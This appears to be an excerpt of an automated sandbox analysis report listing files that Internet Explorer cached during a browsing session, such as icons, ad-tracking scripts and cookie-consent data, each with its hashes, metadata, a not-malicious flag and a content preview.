                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx.eSMHTQ...7.o.8#3.0....M.BPJDi..*.E..h.A...6..0.Z$..i.A...B....H0*.rl..F.y:?...9O..^......=.J..h..M]f>.I...d...V.D..@....T..5`......@..PK.t6....#,.....o&.U*.lJ @...4S.J$..&......%v.B.w.Fc......'B...7...B..0..#z..J..>r.F.Ch..(.U&.\..O.s+..,]Z..w..s.>.I_.......U$D..CP.<....].\w..4..~...Q....._...h...L......X.{i... {..&.w.:.....$.W.....W..."..S.pu..').=2.C#X..D.........}.$..H.F}.f...8...s..:.....2..S.LL..'&.g.....j.#....oH..EhG'...`.p..Ei...D...T.fP.m3.CwD).q.........x....?..+..2....wPyW...j........$..1........!W*u*e"..Q.N#.q..kg...%`w.-.o..z..CO.k.....&..g..@{..k.J._...)X..4)x...ra.#....i._1...f..j...2..&.J.^. .@$.`0N.t.......D.....iL...d/.|Or.L._...;a..Y.]i.._J....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBZbaoj[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):351
                                                                                                                                                                                                                              Entropy (8bit):6.901959384450008
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahmlVPGiBERRpXw0kdFA2ykO2tWNNClAukllbp:6v/7fB0RpXw0otykOhNN4kll1
                                                                                                                                                                                                                              MD5:34B5D386B790631BCF4E193D22CCD4A7
                                                                                                                                                                                                                              SHA1:E65C95C426A4430A96782CE1B9156C2DDDF8807F
                                                                                                                                                                                                                              SHA-256:6FA5E53DF07126D22CF60FA1DBCF537FE1F82F26520738317CB0086CA923AD44
                                                                                                                                                                                                                              SHA-512:D0FBCC60FCABCCF01B13735903BEE75C4843688C8208D9B7D51D47AA7B6DC6B00ACDAB83116238F8D5FC9405B96B5DFA7BD66390F8A1D8E4491BAB81D18D12F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx.cy.".....B.^.V....[30......G......8...4....P..x......U.9..`...6~.^...g630...1L.F.4...O..w....r....A.@.`..+......0}p...@....+.1...0..t.E.../....S.a... y..@.?/.c@.6.K.....`..,!. P:..._l.n...0...|..n.`.....`..r:.0...r.!.a..W..7.30r.....G.1.2........i.$..`5..B\b.#zL..r.8....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\checksync[1].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21717
                                                                                                                                                                                                                              Entropy (8bit):5.305602492520896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
                                                                                                                                                                                                                              MD5:677C48207F5A13E6D6DADF30D2D6C52B
                                                                                                                                                                                                                              SHA1:10BCE9871F228CA247E92B0A6366D5FE2A4426C8
                                                                                                                                                                                                                              SHA-256:16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
                                                                                                                                                                                                                              SHA-512:7C35E7BE4917DEF18676DCD367EA060F9073A093D9B66D6104784845E8B3AA3C14846F617661384E9A4F07E9FE149156A0C54DBF1030CBB4ED972CAF5F115CF8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\de-ch[1].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):79097
                                                                                                                                                                                                                              Entropy (8bit):5.337866393801766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                                                                                                                                                                                              MD5:408DDD452219F77E388108945DE7D0FE
                                                                                                                                                                                                                              SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                                                                                                                                                                                              SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                                                                                                                                                                                              SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\iab2Data[1].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):271194
                                                                                                                                                                                                                              Entropy (8bit):5.144309124586737
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:l3JqIHQCSq23YILFMPpWje+KULpfqjI9zT:hqCSVyIeiijq
                                                                                                                                                                                                                              MD5:69E873EC1DB1AA38922F46E435785B61
                                                                                                                                                                                                                              SHA1:0E17DD5D16C19D40847AEEEC9AF898BB7F228801
                                                                                                                                                                                                                              SHA-256:D90C45999873C12E05B6A850C7C5473E1CB3DA9BD087DB5F038F56ABD65F108C
                                                                                                                                                                                                                              SHA-512:27F403FDC906C317F4023735B29ABB090867CAA41103CE2FD19E487323EBEE15884DF10A353741C218BB83C748464BE3D75459F5D086FDE983DB85FC86ADA4D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\medianet[3].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):411779
                                                                                                                                                                                                                              Entropy (8bit):5.4871296565633285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:z7hkYqP1vG2jnmuynGJ8nKM03VCuPbpXEcJuzYmD:Y1vFjKnGJ8KMGxT6YmD
                                                                                                                                                                                                                              MD5:AF670B889B9B543EBEC77183AC70A006
                                                                                                                                                                                                                              SHA1:05785425B9FFD0051FA7BA32BA796A75A987B3C7
                                                                                                                                                                                                                              SHA-256:E01C5E5D99FFEE14D97AA6CCB277A118244F658DA0ED9CE718CD4391F6242125
                                                                                                                                                                                                                              SHA-512:776CC310FF36AE506C766FCDECD4DF676C5B2F18EA9077BE774656FD4AE4C08880FE70ECE44E4D60AB6E11E762AEB8B3A7D83CBAAE1440D08FEA414288B372C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\medianet[4].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):411779
                                                                                                                                                                                                                              Entropy (8bit):5.48713787053686
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:z7CkYqP1vG2jnmuynGJ8nKM03VCuPbGXEcJuzYmD:j1vFjKnGJ8KMGxTvYmD
                                                                                                                                                                                                                              MD5:957EAAA9298DF60EE861591FA19C218F
                                                                                                                                                                                                                              SHA1:A1207DA877214336D58A1974B2F143462B75C41D
                                                                                                                                                                                                                              SHA-256:427264BFF78795AFC64316B20F3A4BAEB135AA192043A2DC7D95CC9421150236
                                                                                                                                                                                                                              SHA-512:61714C26AD46F375CCA4A5A02AD6428E81F499062F8E8741B7128794D77A995CEE7B761599B02BE7A22BEB971271ADA10F70D1D05346683979B4A677862D63FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\otCommonStyles[1].css
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20953
                                                                                                                                                                                                                              Entropy (8bit):5.003252373878778
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:LIsia0zYw49vRn4l7cWQjRkmSxoU/4OIZZTg8l9Qonnq3WwHpUkG4HfeXiPcB2jk:HRc7fQxNGoFBlCHcXaivSYBQY2YpuML
                                                                                                                                                                                                                              MD5:E4F88E3AF211BD9EA203D23CB0B261D5
                                                                                                                                                                                                                              SHA1:6067E95844B3E11A275ADD0B41D7AD3F00A426FD
                                                                                                                                                                                                                              SHA-256:E58322F14AC511762E2C74932104D7205440281520CF98E66F15B40AA8E60D05
                                                                                                                                                                                                                              SHA-512:B2C8870B61E9132DC7D7167F50F7C85BFE67EAC6DA711BDF0B9C85EB026249A95E8D67FFB0699934EAA304F971E44F0180E8578AFD8353943154FCE689690B76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: #onetrust-banner-sdk{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}#onetrust-banner-sdk .onetrust-vendors-list-handler{cursor:pointer;color:#1f96db;font-size:inherit;font-weight:bold;text-decoration:none;margin-left:5px}#onetrust-banner-sdk .onetrust-vendors-list-handler:hover{color:#1f96db}#onetrust-banner-sdk:focus{outline:2px solid #000;outline-offset:-2px}#onetrust-banner-sdk a:focus{outline:2px solid #000}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{outline-offset:1px}#onetrust-banner-sdk .ot-close-icon,#onetrust-pc-sdk .ot-close-icon,#ot-sync-ntfy .ot-close-icon{background-image:url("data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHg9IjBweCIgeT0iMHB4IiB3aWR0aD0iMzQ4LjMzM3B4IiBoZWlnaHQ9IjM0OC4zMzNweCIgdmlld0JveD0iMCAwIDM0OC4zMzMgMzQ4LjMzNCIgc3R5bGU9ImVuYWJsZS1iYWNrZ3
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\otFlat[2].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12859
                                                                                                                                                                                                                              Entropy (8bit):5.237784426016011
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Mjuyejbn42OdP85csXfn/BoH6iAHyPtJJAk:M6ye1/m
                                                                                                                                                                                                                              MD5:0097436CBD4943F832AB9C81968CB6A0
                                                                                                                                                                                                                              SHA1:4734EF2D8D859E6BFF2E4F3F7696BA979135062C
                                                                                                                                                                                                                              SHA-256:F330D3AE039F615FF31563E4174AAE9CEAD8E99E00297146143335F65199A7A9
                                                                                                                                                                                                                              SHA-512:3CC406AE3430001B8F305FA5C3964F992BA64CE652CCABD69924FE35E69675524E77A9E288DDE9BCF697B9C1C080871076C84399CDFAD491794B8F2642008BE6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiByb2xlPSJhbGVydGRpYWxvZyIgYXJpYS1kZXNjcmliZWRieT0ib25ldHJ1c3QtcG9saWN5LXRleHQiPjxkaXYgY2xhc3M9Im90LXNkay1jb250YWluZXIiPjxkaXYgY2xhc3M9Im90LXNkay1yb3ciPjxkaXYgaWQ9Im9uZXRydXN0LWdyb3VwLWNvbnRhaW5lciIgY2xhc3M9Im90LXNkay1laWdodCBvdC1zZGstY29sdW1ucyI+PGRpdiBjbGFzcz0iYmFubmVyX2xvZ28iPjwvZGl2PjxkaXYgaWQ9Im9uZXRydXN0LXBvbGljeSI+PGgzIGlkPSJvbmV0cnVzdC1wb2xpY3ktdGl0bGUiPlRpdGxlPC9oMz48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPnRpdGxlPGEgaHJlZj0iIyI+cG9saWN5PC9hPjwvcD48ZGl2IGNsYXNzPSJvdC1kcGQtY29udGFpbmVyIj48aDMgY2xhc3M9Im90LWRwZC10aXRsZSI+V2UgY29sbGVjdCBkYXRhIGluIG9yZGVyIHRvIHByb3ZpZGU6PC9oMz48ZGl2IGNsYXNzPSJvdC1kcGQtY29udGVudCI+PHAgY2xhc3M9Im90LWRwZC1kZXNjIj5kZXNjcmlwdGlvbjwvcD48L2Rpdj48L2Rpdj48L2Rpdj48L2Rpdj48ZGl2IGlkPSJvbmV0cnVzdC1idXR0b24tZ3JvdXAtcGFyZW50IiBjbGFzcz0ib3Qtc2RrLXRocmVlIG90LXNkay1jb2x1bW5zIj48ZGl2IGlkPSJvbmV0cnVzdC1idXR0b24tZ3JvdXAiPjxidXR0b24
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\otPcCenter[2].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48633
                                                                                                                                                                                                                              Entropy (8bit):5.555948771441324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:VwcBWh5ZSMYib6pWXlzZz6c18tiHoQqhI:VwqZYdZz6c18tySI
                                                                                                                                                                                                                              MD5:928BD4F058C3CE1FD20BE50FE74F1CD8
                                                                                                                                                                                                                              SHA1:5CBF71DB356E50C3FFCB58E309439ED7EB1B892E
                                                                                                                                                                                                                              SHA-256:6048F2D571D6AE8F49E078A449EB84113D399DD5EA69FB5AC9C69241CD7BA945
                                                                                                                                                                                                                              SHA-512:1E165855CEF80DDFBE2129FA49A0053055561ADEFF7756DE5EA22338D0770925313CCB0993AD032B95ACE336594A5F38E9EE0F0B58ADFE1552FE9251993391C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImFsZXJ0ZGlhbG9nIj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGNsYXNzPSJvdC1wYy1oZWFkZXIiPjwhLS0gTG9nbyBUYWcgLS0+PGRpdiBjbGFzcz0ib3QtcGMtbG9nbyIgcm9sZT0iaW1nIiBhcmlhLWxhYmVsPSJDb21wYW55IExvZ28iPjwvZGl2PjxidXR0b24gaWQ9ImNsb3NlLXBjLWJ0bi1oYW5kbGVyIiBjbGFzcz0ib3QtY2xvc2UtaWNvbiIgYXJpYS1sYWJlbD0iQ2xvc2UiPjwvYnV0dG9uPjwvZGl2PjwhLS0gQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im90LXBjLWNvbnRlbnQiIGNsYXNzPSJvdC1wYy1zY3JvbGxiYXIiPjxoMiBpZD0ib3QtcGMtdGl0bGUiPllvdXIgUHJpdmFjeTwvaDI+PGRpdiBpZD0ib3QtcGMtZGVzYyI+PC9kaXY+PGJ1dHRvbiBpZD0iYWNjZXB0LXJlY29tbWVuZGVkLWJ0bi1oYW5kbGVyIj5BbGxvdyBhbGw8L2J1dHRvbj48c2VjdGlvbiBjbGFzcz0ib3Qtc2RrLXJvdyBvdC1jYXQtZ3JwIj48aDMgaWQ9Im90LWNhdGVnb3J5LXRpdGxlIj5NYW5hZ2UgQ29va2llIFByZWZlcmVuY2VzPC9oMz48ZGl2IGNsYXNzPSJvdC1wbGktaGRyIj48c3BhbiBjbGFzcz0ib3QtbGktdGl0bGUiPkNvbnNlbnQ8L3NwYW4+IDxzcGFuIGNsYXNzPSJvdC1saS1
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\otTCF-ie[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):103536
                                                                                                                                                                                                                              Entropy (8bit):5.315961772640951
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:nq79kuJrnt6JjU7cVbkhS/G+FBlTjmSmjCRp0QRaPXJHJVhXKNTUCL29kJlXYoXY:49jht4bbkAOCRpl6TVgTUCLBX10UU/px
                                                                                                                                                                                                                              MD5:6E60674C04FFF923CE6E30A0CD4B1A04
                                                                                                                                                                                                                              SHA1:D77ED2B9FA6DD82C7A5F740777CC38858D9CBDDD
                                                                                                                                                                                                                              SHA-256:48221F1DE0F509D6C365D9F4BA1D7DB8619E01C6BC4AC8462536836E582CDC66
                                                                                                                                                                                                                              SHA-512:62F5068BDEDBA361DAD0B50B66F617A2A964B9D3DB748BF9DE29C4F6307B1891AF9A4D384F3CEB25C77B62D245F338D967084301391A41BAB9772E2632B36B96
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: var otTCF=function(e){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function t(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function n(e,t){return e(t={exports:{}},t.exports),t.exports}function r(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return I.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return L(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\tag[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10157
                                                                                                                                                                                                                              Entropy (8bit):5.433955043303664
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:4EamzdxOBoOBpxYzKhp5foeeXwhJTvlXQuzSqH3wgiKGWdrBpOIztlomlRokr:4EamR7OrxYSLQdiMoH3wgxGWdrz4+
                                                                                                                                                                                                                              MD5:DDFF3756F9EFD3A46CF3325875D813A1
                                                                                                                                                                                                                              SHA1:05D238659959B28B786CCE43E9E55A728E69428E
                                                                                                                                                                                                                              SHA-256:E80C669818773959643790269ED9448F71BD45D27D61FAFD73BC44C0F40BAACD
                                                                                                                                                                                                                              SHA-512:7E6D325A705718D0B4060BB4A2FACC538B3812B5767CBEF9F15F787C20EFB492F9E72F8F4B215A3C4D4F684236F49D80C37597E2C13F9B482C3CB441B6CA574E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: !function(){"use strict";function r(e,i,c,l){return new(c=c||Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(function(e){e(t)})).then(o,a)}r((l=l.apply(e,i||[])).next())})}function i(n,o){var a,r,i,e,c={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t){return function(e){return function(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw||((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.value]),t[0]){case 0:case 1:i=t;break;case 4:return c.label++,{value:t[1],done:!1};case 5:c.label++,r=t[1],t=[0];continue;case 7:t=c.ops.pop(),c.trys.pop();continue;default:if(!(i=0<(i=c.trys).length&&
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\17-361657-68ddb2ab[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1238
                                                                                                                                                                                                                              Entropy (8bit):5.066474690445609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                                                                                                                                                              MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                                                                                                                                                              SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                                                                                                                                                              SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                                                                                                                                                              SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\3b2da2d4-7a38-47c3-b162-f33e769f51f5[1].jpg
